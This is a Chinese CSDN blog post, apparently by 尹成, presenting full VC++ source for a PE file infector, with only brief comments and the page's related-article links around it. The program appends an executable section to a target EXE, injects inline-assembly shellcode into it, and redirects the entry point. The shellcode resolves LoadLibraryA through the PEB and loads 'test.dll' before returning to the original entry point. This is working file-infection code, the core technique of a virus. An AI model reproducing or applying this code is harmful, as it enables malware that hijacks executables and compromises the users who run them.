VC++实现感染文件式加载DLL文件

最新推荐文章于 2019-06-12 18:27:24 发布
最新推荐文章于 2019-06-12 18:27:24 发布
阅读量3.2k 收藏 3
点赞数 3
分类专栏: VC++编程技术 Visual C++2010编程技术 WindowsC++编程 文章标签: vc++ dll image header file module
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/itcastcpp/article/details/7868684
版权

 

源码分析如下

 

#include "windows.h"    
#include "stdio.h"    
//判断文件是否为合法PE文件    
BOOL CheckPe(FILE* pFile)   
{          
    fseek(pFile,0,SEEK_SET);   
    BOOL    bFlags=FALSE;   
    WORD    IsMZ;   
    DWORD   IsPE,pNT;   
    fread(&IsMZ,sizeof(WORD),1,pFile);   
    if(IsMZ==0x5A4D)   
    {   
        fseek(pFile,0x3c,SEEK_SET);   
        fread(&pNT,sizeof(DWORD),1,pFile);   
        fseek(pFile,pNT,SEEK_SET);   
        fread(&IsPE,sizeof(DWORD),1,pFile);   
        if(IsPE==0X00004550)   
            bFlags=TRUE;   
        else   
            bFlags=FALSE;   
    }   
    else   
        bFlags=FALSE;   
    fseek(pFile,0,SEEK_SET);   
    return bFlags;   
}   
   
//用来计算对齐数据后的大小    
int alig(int size,unsigned int align)   
{   
    if(size%align!=0)   
        return (size/align+1)*align;   
    else    
        return size;   
}   
   
   
int main(int argc,char* argv[])   
{   
    if(argc!=2)   
    {   
        printf("\t\tusage:add_section filename\n");   
        exit(-1);   
    }   
    FILE* rwFile;   
    if((rwFile=fopen(argv[1],"rb"))==NULL)//打开文件失败则退出    
    {   
        printf("\t\tOpen file faild\n");   
        exit(-1);   
    }   
   
    if(!CheckPe(rwFile))   
    {   
        printf("\t\tinvalid pe......!\n");   
        exit(-1);   
    }   
    //备份原文件    
    char szNewFile[10]="_New.exe";   
    if(!CopyFile(argv[1],szNewFile,0)) //若备份文件出错则退出    
    {   
        printf("\t\tbak faild\n");   
        exit(-1);   
    }   
    IMAGE_NT_HEADERS NThea;    
    fseek(rwFile,0x3c,0);   
    DWORD pNT; //pNT中存放IMAGE_NT_HEADERS结构的地址    
    fread(&pNT,sizeof(DWORD),1,rwFile);   
    fseek(rwFile,pNT,0);   
    fread(&NThea,sizeof(IMAGE_NT_HEADERS),1,rwFile); //读取原文件的IMAGE_NT_HEADERS结构    
    //保存原文件区块数量与OEP    
    int nOldSectionNo=NThea.FileHeader.NumberOfSections;   
    int OEP=NThea.OptionalHeader.AddressOfEntryPoint;   
    //保存文件对齐值与区块对齐值    
    int SECTION_ALIG=NThea.OptionalHeader.SectionAlignment;   
    int FILE_ALIG=NThea.OptionalHeader.FileAlignment;   
   
    //定义要添加的区块    
    IMAGE_SECTION_HEADER    NewSection;   
    //将该结构全部清零    
    memset(&NewSection, 0, sizeof(IMAGE_SECTION_HEADER));   
    //再定义一个区块,来存放原文件最后一个区块的信息    
    IMAGE_SECTION_HEADER SEChea;    
    //读原文件最后一个区块的信息    
    fseek(rwFile,pNT+248,0);   
    for(int i=0;i<nOldSectionNo;i++)   
        fread(&SEChea,sizeof(IMAGE_SECTION_HEADER),1,rwFile);   
   
    FILE *newfile=fopen(szNewFile,"rb+");   
    if(newfile==NULL)   
    {   
        printf("\t\tOpen bak file faild\n");   
        exit(-1);   
    }   
    fseek(newfile,SEChea.PointerToRawData+SEChea.SizeOfRawData,SEEK_SET);   
    goto shellend;   
__asm   
{          
shell:  PUSHAD   
        MOV EAX,DWORD PTR FS:[30H]  ;FS:[30H]指向PEB   
        MOV EAX,DWORD PTR [EAX+0CH] ;获取PEB_LDR_DATA结构的指针   
        MOV EAX,DWORD PTR [EAX+1CH] ;获取LDR_MODULE链表表首结点的inInitializeOrderModuleList成员的指针   
        MOV EAX,DWORD PTR [EAX] ;LDR_MODULE链表第二个结点的inInitializeOrderModuleList成员的指针   
        MOV EAX,DWORD PTR [EAX+08H] ;inInitializeOrderModuleList偏移8h便得到Kernel32.dll的模块基址   
        MOV EBP,EAX     ;   将Kernel32.dll模块基址地址放至kernel中   
        MOV EAX,DWORD PTR [EAX+3CH] ;指向IMAGE_NT_HEADERS   
        MOV EAX,DWORD PTR [EBP+EAX+120] ;指向导出表   
        MOV ECX,[EBP+EAX+24]    ;取导出表中导出函数名字的数目   
        MOV EBX,[EBP+EAX+32]    ;取导出表中名字表的地址   
        ADD EBX,EBP   
        PUSH WORD  PTR 0X00         ;构造GetProcAddress字符串   
        PUSH DWORD PTR 0X73736572   
        PUSH DWORD PTR 0X64644163   
        PUSH DWORD PTR 0X6F725074   
        PUSH WORD PTR 0X6547   
        MOV  EDX,ESP   
        PUSH ECX   
   
           
F1:    
        MOV EDI,EDX   
        POP ECX   
        DEC ECX   
        TEST    ECX,ECX   
        JZ  EXIT   
        MOV ESI,[EBX+ECX*4]        
        ADD ESI,EBP   
        PUSH    ECX   
        MOV ECX,15   
        REPZ    CMPSB   
        TEST    ECX,ECX   
        JNZ F1   
       
        POP ECX   
        MOV ESI,[EBP+EAX+36]    ;取得导出表中序号表的地址   
        ADD ESI,EBP   
        MOVZX   ESI,WORD PTR[ESI+ECX*2]     ;取得进入函数地址表的序号   
        MOV EDI,[EBP+EAX+28]    ;取得函数地址表的地址   
        ADD EDI,EBP   
        MOV EDI,[EDI+ESI*4]     ;取得GetProcAddress函数的地址   
        ADD EDI,EBP            
           
        PUSH WORD PTR 0X00          ;构造LoadLibraryA字符串   
        PUSH DWORD PTR 0X41797261   
        PUSH DWORD PTR 0X7262694C   
        PUSH DWORD PTR 0X64616F4C   
        PUSH ESP   
        PUSH    EBP   
        CALL    EDI         ;调用GetProcAddress取得LoadLibraryA函数的地址   
        PUSH    WORD PTR 0X00       ;构造test符串,测试新增节后的EXE是否能正常加载test.dll   
        PUSH    DWORD PTR 0X74736574   
        PUSH    ESP   
        CALL    EAX   
EXIT:   ADD ESP,36          ;平衡堆栈   
        POPAD   
}   
shellend:   
        char *pShell;   
        int nShellLen;   
__asm   
{   
        LEA EAX,shell   
        MOV pShell,EAX;   
        LEA EBX,shellend   
        SUB EBX,EAX   
        MOV nShellLen,EBX   
}   
       
    //写入SHELLCODE,    
    for(i=0;i<nShellLen;i++)   
        fputc(pShell[i],newfile);   
    //SHELLCODE之后是跳转到原OEP的指令    
    NewSection.VirtualAddress=SEChea.VirtualAddress+alig(SEChea.Misc.VirtualSize,SECTION_ALIG);   
    BYTE jmp = 0xE9;   
    OEP=OEP-(NewSection.VirtualAddress+nShellLen)-5;   
    fwrite(&jmp, sizeof(jmp), 1, newfile);   
    fwrite(&OEP, sizeof(OEP), 1, newfile);   
    //将最后增加的数据用0填充至按文件中对齐的大小    
    for(i=0;i<alig(nShellLen,FILE_ALIG)-nShellLen-5;i++)   
        fputc('\0',newfile);   
    //新区块中的数据    
    strcpy((char*)NewSection.Name,".llydd");   
    NewSection.PointerToRawData=SEChea.PointerToRawData+SEChea.SizeOfRawData;   
    NewSection.Misc.VirtualSize=nShellLen;   
    NewSection.SizeOfRawData=alig(nShellLen,FILE_ALIG);   
    NewSection.Characteristics=0xE0000020;//新区块可读可写可执行    
    fseek(newfile,pNT+248+sizeof(IMAGE_SECTION_HEADER)*nOldSectionNo,0);   
   
    //写入新的块表    
    fwrite(&NewSection,sizeof(IMAGE_SECTION_HEADER),1,newfile);   
   
    int nNewImageSize=NThea.OptionalHeader.SizeOfImage+alig(nShellLen,SECTION_ALIG);   
    int nNewSizeofCode=NThea.OptionalHeader.SizeOfCode+alig(nShellLen,FILE_ALIG);   
    fseek(newfile,pNT,0);   
    NThea.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress=0;   
    NThea.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size=0;   
    NThea.OptionalHeader.SizeOfCode=nNewSizeofCode;   
    NThea.OptionalHeader.SizeOfImage=nNewImageSize;   
    NThea.FileHeader.NumberOfSections=nOldSectionNo+1;   
    NThea.OptionalHeader.AddressOfEntryPoint=NewSection.VirtualAddress;   
    //写入更新后的PE头结构    
    fwrite(&NThea,sizeof(IMAGE_NT_HEADERS),1,newfile);   
    printf("\t\tok.........!\n");   
   
    fclose(newfile);   
    fclose(rwFile);   
   
    return 1;    
   
}


 

尹成
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
编程实现感染PE文件加载DLL
12-14
编程实现感染PE文件加载DLL,http://blog.csdn.net/ebxds/article/details/41911619
vc++2015运行库散装dll文件
04-01
1.该资源并非安装包!!如需安装包去到微软官网下载。 2.附件是vc++2015运行库的所有dll文件,用于开发应用程序时,直接一起打包放在程序根目录发布而无需另外安装。 3.该资源包了x86和x64版本
VC6 静态与动态加载Dll [示例代码]
wanglei2258的专栏
04-09 887
1、DLL源代码 MyDll.hview plaincopy to clipboardprint?//////////////////////////////////////////////////////////////////////////   // MyDll.h   // 声明函数   int _stdcall Add(int a,int b);   int _stdcall S
常见程序入口点(OEP)特征
banhanjun1518的博客
07-05 366
delphi: 55 PUSH EBP 8BEC MOV EBP,ESP 83C4 F0 ADD ESP,-10 B8 A86F4B00 MOV EAX,PE.004B6FA8 vc++ 55 PUSH EBP 8BEC MOV EBP,ESP 83EC 44...
vc编自己的壳之一:对pe文件OEP的修改
rageliu的专栏
03-16 3024
最近学习pe格壳,最终目标是出自己的壳,并有一定的anti能力.调试了下修改pe文件的oep,然后在新的入口点什么都没做,只是jmp回到原始入口点,程序继续执行.测试通过. 准备明天在自己入口点的地方添加一个MessageBox代码.很多是网上朋友的代码,借用下不好意思,如有版权等问题请联系偶,偶会尽快处理,谢谢.void CPeSecDlg::Go(){ HANDLE hFi
VC读取PE文件的OEP(程序入口)
weixin_33797791的博客
06-12 804
为什么80%的码农都做不了架构师?>>> ...
visual studio生成程序的OEP的特点
lixiangminghate的专栏
08-08 1291
PEID 判断一个应用程序的开发环境主要依据3个地方,  1, 代码入口 2, PE结构中的链接器版本     BYTE    MajorLinkerVersion;     BYTE    MinorLinkerVersion; 3, 特征码。来看下不同VS版本生成的exe的特征码: 一:VC6 标准OEP: 入口点代码是固定的代码(55 PUSH EBP),入口调用的API也是相同的,其中...
常见程序入口点(OEP)特征
要不,单步调试走起?
11-12 3549
转自:http://www.21arm.com/forum.php?mod=viewthread&tid=691&extra=page%3D1 ============================我是转载的分割线=================================== delphi:   55            PUSH EBP   8BEC
感染EXE文件的VC++源码,请谨慎使用.
03-07
感染EXE文件的VC++源码,请谨慎使用.
c++ 感染exe运行DLL
11-12
由vc编译的 感染exe运行DLL例子 供大家参考,主要学习思路
VC++动态加载DLL例子
09-10
对话框模下动态加载DLL的简单例子: DLL为已经创建好的. VC++动态加载DLL例子
C#实现动态加载dll的方法
01-21
本文实例讲述了C#实现动态加载dll的方法。分享给大家供大家参考。具体实现方法如下: 代码如下: using System; using System.Collections.Generic; using System.Text; using System.Reflection; using System.IO; ...
c# 动态加载dll文件,并实现调用其中的简单方法
08-31
下面小编就为大家带来一篇c# 动态加载dll文件,并实现调用其中的简单方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
VC++ 获取任意DLL/EXE文件属性信息
03-17
内容索引:VC/C++源码,文件操作,获取文件属性 VC++ 获取任意DLL/EXE文件属性信息,可得到名称、内置的函数名称、函数序号、函数地址等信息,文件较小,可直接编译运行。
满意度调查行·知dr.pptx
04-25
满意度调查行·知dr.pptx
基于B2C的网上拍卖系统_秒杀与竞价.zip
04-25
基于B2C的网上拍卖系统主要用于帮助人们应用互联网方便快捷买到自己所中意的商品,并参与到秒杀与竞拍当中。 主要功能包括: 1.前台模块 (1)普通用户登录/注册。 (2)分类查看商品(普通商品与促销商品) (3)查看商品详细信息 (4)查看秒杀商品 (5)查看竞拍商品 (6)将商品加入购物车 (7)购买,结算功能 (8)留言 2.后台模块 (1)修改密码 (2)商品管理: -- 编辑/删除 -- 设置/取消促销 (3)秒杀商品:设置/取消秒杀 (4)竞拍商品:设置/取消竞拍 (5)订单管理:查看订单 (5)留言管理:查看/删除留言 项目访问路径: 前台:http://localhost:8080/sale 后台:http://localhost:8080/sale/user/adminlogin
分布系统中Java后端开发技术及其应用实践.pdf
最新发布
04-25
分布系统的核心思想是复杂计算任务的拆分与并行计算,可有效减少计算时间、节约算力成本。以分布系统中Java后端开发技术的应用为主题,分析分布系统开发的需求,探讨Java技术栈、分布监控与日志管理、云服务模型在分布系统Java后端开发中的应用路径,旨在为分布系统的设计与实现提供全面的理论分析和实践指导,以支持构建高效、稳定、可扩展的企业级Java应用。 随着云计算、大数据和人工智能技术的飞速发展, 分布系统已成为支撑现代企业信息系统的基础架构。 Java 后端开发技术在构建分布系统中扮演着至关重要的 角色,其应用价值和研究重点主要集中在微服务架构、容 器化技术、自动化部署、服务网格、无服务器计算、应用 程序编程接口(Application Programming Interface, API)管理、数据一致性解决方案、分布缓存、负载均衡、 复杂事件处理和分布事务管理等方面[1]。Java平台以 其成熟的生态系统、跨平台的移植性、丰富的开源框架 和库以及稳定的性能,为分布系统的开发提供了坚实 的基础[2]。深入探讨Java后端开发技术在分布系统中 的应用实践,旨在为企
怎么加载dll文件
06-01
在 Windows 平台上,加载 DLL 文件通常需要以下步骤: 1. 使用 `LoadLibrary` 函数加载 DLL 文件,该函数返回一个模块句柄。例如: ```c++ HMODULE hDll = LoadLibrary("example.dll"); ``` 2. 使用 `...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尹成

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值